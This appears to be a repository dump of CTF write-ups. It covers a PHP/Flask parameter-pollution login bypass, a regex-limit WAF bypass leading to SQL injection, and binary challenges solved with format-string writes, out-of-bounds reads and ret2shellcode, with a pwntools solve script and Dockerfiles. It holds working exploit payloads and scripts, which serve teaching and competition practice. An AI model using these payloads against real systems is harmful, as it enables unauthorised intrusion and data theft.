├── .gitignore
├── 0xL4ughCTF2024
└── Web
│ ├── Micro
│ ├── Micro.assets
│ │ ├── image-20240210150920736.png
│ │ ├── image-20240210151741945.png
│ │ ├── image-20240210152301313.png
│ │ ├── image-20240210153313784.png
│ │ ├── image-20240210153458215.png
│ │ └── image-20240210155656417.png
│ ├── Micro_togive.zip
│ └── readme.md
│ └── Simple WAF
│ ├── Simple_Waf.assets
│ ├── image-20240210150920736.png
│ ├── image-20240210151741945.png
│ ├── image-20240210152301313.png
│ ├── image-20240210153313784.png
│ ├── image-20240210155656417.png
│ ├── image-20240210161715903.png
│ ├── image-20240210161719338.png
│ ├── image-20240210164046515.png
│ ├── image-20240210171848657.png
│ ├── image-20240210172104027.png
│ ├── image-20240210172317503.png
│ └── image-20240210172444303.png
│ └── readme.md
├── Aswan CTF 25
├── Finals
│ └── Pwn
│ │ ├── Baby Blue
│ │ ├── Readme.md
│ │ ├── baby_blue_player.zip
│ │ ├── challenge
│ │ │ ├── Dockerfile
│ │ │ ├── src
│ │ │ │ ├── .gdb_history
│ │ │ │ ├── baby_blue
│ │ │ │ ├── flag
│ │ │ │ ├── ld-linux-x86-64.so.2
│ │ │ │ └── libc.so.6
│ │ │ └── ynetd
│ │ ├── docker-compose.yml
│ │ ├── flag
│ │ ├── image-1.png
│ │ ├── image-2.png
│ │ ├── image-3.png
│ │ ├── image-4.png
│ │ ├── image.png
│ │ └── solve.py
│ │ └── Lucky
│ │ ├── Lucky_Player.zip
│ │ ├── Readme.md
│ │ ├── challenge
│ │ ├── Dockerfile
│ │ ├── src
│ │ │ ├── flag
│ │ │ ├── ld-linux-x86-64.so.2
│ │ │ ├── libc.so.6
│ │ │ └── lucky
│ │ └── ynetd
│ │ ├── docker-compose.yml
│ │ └── solve.py
└── Quals
│ └── Pwn
│ └── Elbareed Elmasry
│ ├── Dockerfile
│ ├── Elbareed_Elmasry_Player.zip
│ ├── Readme.md
│ ├── solve.py
│ ├── src
│ ├── .gdb_history
│ ├── Elbareed_Elmasry
│ ├── flag
│ ├── ld-linux-x86-64.so.2
│ └── libc.so.6
│ └── ynetd
├── BYUCTF 2025
└── pwn
│ └── Game of Yap
│ ├── .gdb_history
│ ├── chall.zip
│ ├── game-of-yap
│ ├── game-of-yap_patched
│ ├── ld-2.39.so
│ ├── libc.so.6
│ ├── readme.md
│ └── solve.py
├── CAT CTF23
├── Forensics
│ └── Revenge I
│ │ └── Readme.md
└── Web
│ └── Xss 3
│ └── readme.md
├── CSAW2024
└── quals
│ └── pwn
│ ├── mini-golfing
│ ├── .gdb_history
│ ├── golf
│ ├── golf_patched
│ ├── main.c
│ └── solve.py
│ ├── nix-philosophies
│ ├── .gdb_history
│ ├── chal
│ ├── chal_patched
│ ├── flag.txt
│ └── solve.py
│ └── vip_blacklist
│ ├── solve.py
│ └── vip_blacklist
├── CyCTF23
└── Web
│ └── CyVoting.md
├── CyCTF24
└── Pwn
│ └── CyParser
│ ├── cyparser
│ ├── image-1.png
│ ├── image.png
│ ├── libc.so.6
│ ├── readme.md
│ └── solve.py
├── DamCTF2025
└── Pwn
│ └── dnd
│ ├── dnd.zip
│ └── solver.py
├── FDC Universities CTF.ae
└── Pwn
│ ├── Internal Sandbox Service
│ ├── Ghidra_decompliation
│ ├── image-1.png
│ ├── image.png
│ ├── main
│ ├── readme.md
│ └── solve.py
│ └── No conventions
│ ├── .gdb_history
│ ├── Dockerfile
│ ├── docker-compose.yml
│ ├── hook.sh
│ ├── image-1.png
│ ├── image-2.png
│ ├── image.png
│ ├── main
│ ├── readme.md
│ ├── solve.py
│ └── ynetd
├── RandomScripts
└── phpinfo_race.py
├── Readme.md
├── Satoki24
└── Web
│ └── OSQLinj
│ └── readme.md
├── SekaiCTF2023
└── DFIR
│ └── Eval Me
│ └── readme.md
├── TAMU CTF 2023
└── web
│ ├── BlackBox
│ ├── Readme.md
│ └── black.zip
│ ├── Connect
│ ├── Readme.md
│ └── connect.zip
│ └── Migraine
│ ├── Readme.md
│ └── migraine.zip
├── THM
└── pwn101
│ ├── 108
│ ├── core
│ ├── pwn108-1644300489260.pwn108
│ ├── pwn108-1644300489260.pwn108_patched
│ └── solve.py
│ ├── 109
│ ├── .gdb_history
│ ├── core
│ ├── libc.so.6
│ ├── pwn109-1644300507645.pwn109
│ ├── pwn109-1644300507645.pwn109_patched
│ └── solve.py
│ └── 110
│ ├── .gdb_history
│ ├── core
│ ├── gadgets
│ ├── pwn110-1644300525386.pwn110
│ ├── pwn110-1644300525386.pwn110_patched
│ ├── solve.py
│ └── solve2.py
├── TJCTF25
├── pwn
│ ├── birds
│ │ ├── birds
│ │ ├── birds_patched
│ │ └── solve.py
│ ├── buggy
│ │ ├── .gdb_history
│ │ ├── chall
│ │ ├── chall.c
│ │ ├── chall_patched
│ │ └── solve.py
│ ├── extra-credit
│ │ ├── flag.txt
│ │ ├── gradeViewer
│ │ ├── gradeViewer_patched
│ │ ├── password_brute1.py
│ │ ├── password_brute2.py
│ │ └── solve.py
│ └── heroquest
│ │ ├── .gdb_history
│ │ ├── flag.txt
│ │ ├── heroQuest
│ │ ├── heroQuest_patched
│ │ └── solve.py
├── readme.md
└── web
│ └── double-nested
│ ├── image-1.png
│ ├── image-2.png
│ ├── image.png
│ ├── readme.md
│ └── src
│ ├── admin-bot.js
│ ├── app.py
│ └── index.html
├── squ1rrel_intro-to-pwn_repo
├── .gitpod.yml
├── LICENSE
├── README.md
├── pwn1
│ ├── .gdb_history
│ ├── main.c
│ ├── pwn1
│ └── solve.py
├── pwn2
│ ├── .gdb_history
│ ├── pwn2
│ └── solve.py
├── pwn3
│ ├── .gdb_history
│ ├── pwn3
│ └── solve.py
├── pwn4
│ ├── .gdb_history
│ ├── pwn4
│ └── solve.py
├── pwn5
│ ├── pwn5
│ └── solve.py
├── pwn6
│ ├── .gdb_history
│ ├── pwn6
│ └── solve.py
├── pwn7
│ ├── .gdb_history
│ ├── pwn7
│ └── solve.py
└── pwn8
│ ├── .gdb_history
│ ├── pwn8
│ └── solve.py
└── ångstromCTF
└── 2023
└── Web
├── Celeste Speedrunning Association
├── Readme.md
└── imgs
│ └── test
├── Readme.md
├── brokenlogin
├── Readme.md
├── adminbot.js
└── app.py
└── hallmark
├── Readme.md
└── dist.tar.gz
/.gitignore:
--------------------------------------------------------------------------------
1 | CSAW2024/finals/
2 | TJCTF25/pwn/birds/.gdb_history
3 | .gitignore
4 | TJCTF25/pwn/extra-credit/.gdb_history
5 |
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210150920736.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210150920736.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210151741945.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210151741945.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210152301313.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210152301313.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210153313784.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210153313784.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210153458215.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210153458215.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210155656417.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210155656417.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Micro/Micro_togive.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Micro/Micro_togive.zip
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Micro/readme.md:
--------------------------------------------------------------------------------
1 | ## Micro web challenge writeup
2 |
3 | Micro is an ez code review web challenge that had 2 files:
4 |
5 | - app.py
6 | - index.php
7 |
8 | With this description:
9 |
10 | ```ini
11 | Remember Bruh 1,2 ? This is bruh 3 : D
12 | login with admin:admin and you will get the flag :*
13 |
14 | > Author : abdoghazy
15 |
16 | [Link](http://20.115.83.90:1338 )
17 | ```
18 |
19 |
20 |
21 | #### index.php analysis:
22 |
23 | #### Login Function
24 |
25 | 
26 |
27 | - Just a simple login function that takes the username and hash the password then pass the username to `Check_Admin` function.
28 | - If the `Check_Admin` function returned True and the ip address wasn't the localhost the page execution will die and print "Admin Login allowed from localhost only : )"
29 | - If the previous condition fail, it will pass the POST data to `send_to_api` function.
30 |
31 |
32 |
33 | #### Check_Admin function
34 |
35 | 
36 |
37 | - Normalizing string to prevent default normalization in mysql.
38 | - Checking if the normalized string had `admin` value case insensitive.
39 | - If the previous condition matched the input it will return true otherwise it will return false.
40 |
41 |
42 |
43 | #### send_to_api function
44 |
45 | 
46 |
47 | - Takes the data and send it to the internal API that running locally at port 5000 .
48 |
49 |
50 |
51 | #### app.py analysis:
52 |
53 | #### 
54 |
55 | - Normal flask login function that checks if the `username` and `password` are existed in the users table.
56 | - If the user existed the application will return the flag.
57 |
58 |
59 |
60 | #### Solution :
61 |
62 | The solution must be clear now, the player must bypass `Check_Admin` function to pass the `admin:admin` creds to the internal API and get the flag.
63 |
64 | the bug here is the way how Flask and Php will handle the parameters if there is more than one parameter with the same name
65 |
66 | like : parameter1=value1¶meter1=value2¶meter1=value3
67 |
68 | php will take the last one and flask will take the first one
69 |
70 | parameter1 in php -> value3
71 |
72 | parameter1 in flask -> value1
73 |
74 |
75 |
76 | So, if we passed : username=admin&username=safe&password=admin&login-submit=
77 |
78 | the php will take the last username so, the value will be "safe" and then `Check_Admin` function will not be triggered so, the post data will be forwarded to the internal API.
79 |
80 | 
81 |
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210150920736.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210150920736.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210151741945.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210151741945.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210152301313.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210152301313.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210153313784.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210153313784.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210155656417.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210155656417.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210161715903.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210161715903.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210161719338.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210161719338.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210164046515.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210164046515.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210171848657.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210171848657.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210172104027.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210172104027.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210172317503.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210172317503.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210172444303.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210172444303.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/readme.md:
--------------------------------------------------------------------------------
1 | ## Simple WAF web challenge quick writeup
2 |
3 | Simple WAF is a medium code review web challenge that had 2 files:
4 |
5 | - index.php
6 | - db.php
7 |
8 | With this description:
9 |
10 | ```ini
11 | i whitelisted input values so, i think iam safe : P
12 |
13 | > Author : abdoghazy
14 |
15 | [Link](http://20.115.83.90:1339/)
16 | ```
17 |
18 |
19 |
20 | #### index.php analysis:
21 |
22 | 
23 |
24 | - Just a simple login function that takes the username and hash the password then pass the username to `waf` function returned true, the page execution will die and print "WAF Block".
25 | - If the waf function returned false the application will pass our parameters directly to the query without any sanitization which make it vulnerable to SQL injection.
26 | - If the login SQL query returned value, the application will return the flag.
27 |
28 |
29 |
30 | #### waf function
31 |
32 | 
33 |
34 | - Using `preg_match` function to match any values with the regex `/([^a-z])+/s`.
35 | - this regex will match anything except : `a-z` for one or more times.
36 |
37 |
38 |
39 | #### Solution :
40 |
41 | The solution must be clear now, the player must bypass `waf` function to do SQL injection and make the query return data and get the flag.
42 |
43 | The bug here is in the return value of the `preg_match` php function.
44 |
45 | `preg_match` and `preg_replace` functions called PCRE functions and based on the php documentation
46 |
47 | it will return 1 if match and 0 if not and FALSE on failure.
48 |
49 | 
50 |
51 | So, if we can make preg_match() fail it will return false and our input will be passed directly to the sql query.
52 |
53 | our Regex is vulnerable to Redos. it checks the pattern recursively one or (more).
54 |
55 | Do you ever think if this (more) had a limit or not ? : D
56 |
57 | yes, pcre php functions hard a limit by default. if you run phpinfo() you will get it.
58 |
59 | 
60 |
61 |
62 |
63 | so basically, we can send alot of any matching characters to make the preg_match function fail and put our payload.
64 |
65 | ```python
66 | python3 -c "print(__import__('requests').post('http://20.115.83.90:1339/',data={'username':'_'*9000+'\'||1#','passwo
67 | rd':'test','login-submit':''}).text)"|head
68 |
69 | ```
70 |
71 |
72 |
73 | https://github.com/mybb/mybb/security/advisories/GHSA-pr74-wvp3-q6f5
74 |
75 | CVE-2023-41362
76 |
77 |
78 |
79 | #### The secure way will be like this :
80 |
81 | ```php
82 | if(preg_match("/([^a-z])+/s",$input) !==0)
83 | {
84 | return true;
85 | }
86 | else
87 | {
88 | return false;
89 | }
90 | ```
91 |
92 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/Readme.md:
--------------------------------------------------------------------------------
1 | ### Challenge Overview
2 |
3 | This challenge is a sequel to the "Elbareed Elmasry" challenge, featuring similar concepts with added complexity. The application includes basic functionalities such as **Register**, **Login**, **View Profile**, and **Admin Panel**.
4 |
5 | The goal is to exploit a short-length format string vulnerability to escalate permissions to `5`, granting access to the admin panel. Once inside, an out-of-bounds (OOB) read vulnerability in the admin panel can be leveraged to leak the flag from memory.
6 |
7 | All standard protections are enabled in this challenge.
8 |
9 | ---
10 |
11 | ### Solution Steps
12 |
13 | #### 1. **Calculating the Permissions Index**
14 |
15 | - Register a user with any username, log in, and set a breakpoint at the vulnerable `printf` function.
16 | - Print the stack and calculate the offset between the top of the stack (`rsp`) and the permissions pointer. Divide the result by `8` (address size) and add `6` (the index of `printf` parameters). This gives the exact index of the permissions pointer: `28`.
17 |
18 | Formula:
19 | `(Permissions address - Top of stack (rsp)) / 8 + 6 = 28`
20 |
21 | - To verify, leak the value at `%28$p`. This should reveal the heap address pointing to the permissions.
22 |
23 | Example Output:
24 | 
25 | 
26 | 
27 | 
28 |
29 | #### 2. **Overriding Permissions**
30 |
31 | - Use the format specifier `%n` to overwrite the permissions pointer. For example:
32 | `AAA%28$n` writes `3` to the pointer at index `28` (as "AAA" is 3 characters long).
33 |
34 | - To set permissions to `5`, craft the payload accordingly:
35 | `AAAAA%28$n`.
36 |
37 | - After sending the payload, re-login with the same account and access the admin panel.
38 |
39 | #### 3. **Exploiting the OOB Read to Leak the Flag**
40 |
41 | - Once admin access is obtained, the flag is loaded into memory.
42 | - The admin panel allows entering a `user_id`, which is used as an index to retrieve user data from the list. However, the application only checks if the index is greater than `7` and does not validate lower bounds.
43 |
44 | - By entering negative indices (e.g., `-1`, `-2`, `-3`), you can read data from the stack. The flag is located at index `-10`.
45 |
46 | Example Output:
47 | 
48 |
49 | ---
50 |
51 | ### Final Exploit Steps
52 |
53 | 1. Register and log in with the username: `"a"`.
54 | 2. Register and log in with the username: `"AAAAA%28$n"` to overwrite the first user's permissions.
55 | 3. Re-login with the username: `"a"`.
56 | 4. Access the admin panel.
57 | 5. Use the OOB read vulnerability to leak the flag from the stack.
58 |
59 | For the full exploit, refer to the [exploit script](./solve.py).
60 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/baby_blue_player.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/baby_blue_player.zip
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM kalilinux/kali-rolling
2 |
3 | # Create CTF user
4 | RUN useradd -d /home/ctf/ -s /bin/bash ctf
5 | RUN apt-get update
6 |
7 | WORKDIR /home/ctf/
8 |
9 | # Copy files
10 | COPY ./src/baby_blue .
11 | COPY ./src/flag .
12 | COPY ./src/libc.so.6 .
13 | COPY ./src/ld-linux-x86-64.so.2 .
14 | COPY ynetd .
15 |
16 | # Set permissions
17 | RUN chown -R root:root .
18 | RUN chmod 555 baby_blue
19 | RUN chmod 555 libc.so.6
20 | RUN chmod 555 ld-linux-x86-64.so.2
21 | RUN chmod 555 ynetd
22 | RUN chmod 444 ./flag
23 |
24 | USER ctf
25 | EXPOSE 8083
26 | CMD ["./ynetd", "-p", "8083", "./baby_blue"]
27 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/src/.gdb_history:
--------------------------------------------------------------------------------
1 | ls
2 | disass show_profile
3 | b *show_profile + 101
4 | r
5 | ni
6 | c
7 | r
8 | stack 20
9 | stack 30
10 | p 0x7fffffffdc70 - 0x7fffffffdbc0
11 | p 176 / 8
12 | p 22 + 6
13 | c
14 | c
15 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/src/baby_blue:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/src/baby_blue
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/src/flag:
--------------------------------------------------------------------------------
1 | YAO{REDACTED}
2 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/src/ld-linux-x86-64.so.2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/src/ld-linux-x86-64.so.2
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/src/libc.so.6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/src/libc.so.6
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/ynetd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/ynetd
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3.8'
2 |
3 | services:
4 | baby_blue:
5 | build:
6 | context: ./challenge
7 | ports:
8 | - "8083:8083"
9 | restart: unless-stopped
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/flag:
--------------------------------------------------------------------------------
1 | YAO{REDACTED}
2 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/image-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/image-1.png
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/image-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/image-2.png
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/image-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/image-3.png
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/image-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/image-4.png
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/image.png
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/solve.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 |
3 |
4 | context.log_level = 'debug'
5 | context.arch = 'amd64'
6 | BINARY = "./challenge/src/baby_blue" # Updated binary name
7 |
8 | if args.LOCAL:
9 | r = process(BINARY)
10 | else:
11 | r = remote("localhost", 8083)
12 |
13 | e = ELF(BINARY)
14 |
15 |
16 | # gdb_script = """
17 | # b *send_letter+75
18 | # """
19 |
20 | def register(username):
21 | print("[*] Registering...")
22 | r.sendline("1")
23 | print("[*] Sending username...")
24 | print(r.recv().decode())
25 | r.sendline(username)
26 |
27 | def login(username):
28 | print("[*] Logging in...")
29 | r.sendline("2")
30 | r.recvuntil(b"Enter username to login:")
31 | r.sendline(username)
32 |
33 | def overwrite_permissions():
34 | print("[*] Overwriting permissions...")
35 | r.sendline("3")
36 | # r.recv() # you may need to remove this (needed for remote instance)
37 | profile = r.recv()
38 | print(profile.decode())
39 |
40 |
41 |
42 | try:
43 | # gdb.attach(r,gdb_script)
44 | output = r.recvuntil(b"Exit\n>")
45 | print(output.decode())
46 | register("1")
47 | print(r.recv().decode())
48 | login("1")
49 | print(r.recv().decode())
50 | register("AAAAA%28$n")
51 | print(r.recv().decode())
52 | login("AAAAA%28$n")
53 | overwrite_permissions()
54 | print(r.recv().decode())
55 | login("1")
56 |
57 | r.sendline("4")
58 | r.sendline("-10")
59 | # print(r.clean(1).decode('utf-8', errors='ignore'))
60 | # r.interactive()
61 | print(r.clean(1).decode('utf-8', errors='ignore'))
62 | # print(r.recv().decode())
63 | # print(r.recv().decode())
64 | # print(r.recv().decode())
65 | except Exception as e:
66 | print(f"[-] Error: {str(e)}")
67 |
68 | finally:
69 | r.close()
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/Lucky_Player.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Lucky/Lucky_Player.zip
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/Readme.md:
--------------------------------------------------------------------------------
1 | ### Brief
2 |
3 | This challenge involves exploiting a simple binary to gain shell access.
The application generates a "lucky number" using `rand() % 1000`, seeded with `srand(time(0))`.
If the user guesses the number correctly, the program calls a function named `gift()`. This function uses the vulnerable `gets()` function to take user input, leading to a buffer overflow (BOF).
4 |
5 | Key details:
6 | - **PIE** is disabled.
7 | - The stack is executable.
8 | - No memory leak is provided for user input.
9 |
10 | This setup makes it a classic **ret2shellcode** challenge.
11 |
12 | ---
13 |
14 | ### Solution Approaches
15 |
16 | #### 1. **Retrieve the lucky number**
17 |
18 | To predict the lucky number:
19 | - Use `ctypes.CDLL('./libc.so.6')` to load the same libc version as the challenge binary.
20 | - Obtain the current timestamp and use it as the seed for `rand()`.
21 | - Calculate `rand() % 1000` to determine the lucky number.
22 | - Send the lucky number to the application to proceed to the `gift()` function.
23 |
24 | #### 2. **Find a gadget to execute the shellcode**
25 |
26 | Inside the `gift()` function:
27 | - After setting a breakpoint, observe that the `gets()` function stores the pointer to the user input in the `RAX` register.
28 | - Use a tool like `ropper` to locate a `jmp rax` gadget in the binary. This gadget will allow you to jump directly to your shellcode.
29 |
30 | ---
31 |
32 | ### Final Exploit Steps
33 |
34 | 1. Load the same libc version as the challenge binary.
35 | 2. Use the current timestamp to seed `rand()` and calculate the lucky number.
36 | 3. Send the lucky number to the application.
37 | 4. Craft your payload:
38 | - Place your shellcode.
39 | - Pad the buffer with `"A"` characters to fill up to 72 bytes (or the required offset).
40 | - Append the address of the `jmp rax` gadget.
41 | 5. Execute the payload to gain a shell.
42 |
43 | [Here is the exploit script](./solve.py)
44 |
45 | This script automates the above steps to exploit the vulnerability and achieve shell access.
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/challenge/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM kalilinux/kali-rolling
2 |
3 | # Create CTF user
4 | RUN useradd -d /home/ctf/ -s /bin/bash ctf
5 | RUN apt-get update
6 |
7 | WORKDIR /home/ctf/
8 |
9 | # Copy files
10 | COPY ./src/lucky .
11 | COPY ./src/flag .
12 | COPY ./src/libc.so.6 .
13 | COPY ./src/ld-linux-x86-64.so.2 .
14 | COPY ynetd .
15 |
16 | # Set permissions
17 | RUN chown -R root:root .
18 | RUN chmod 555 lucky
19 | RUN chmod 555 libc.so.6
20 | RUN chmod 555 ld-linux-x86-64.so.2
21 | RUN chmod 555 ynetd
22 | RUN chmod 444 ./flag
23 |
24 | USER ctf
25 | EXPOSE 8083
26 | CMD ["./ynetd", "-p", "8083", "./lucky"]
27 |
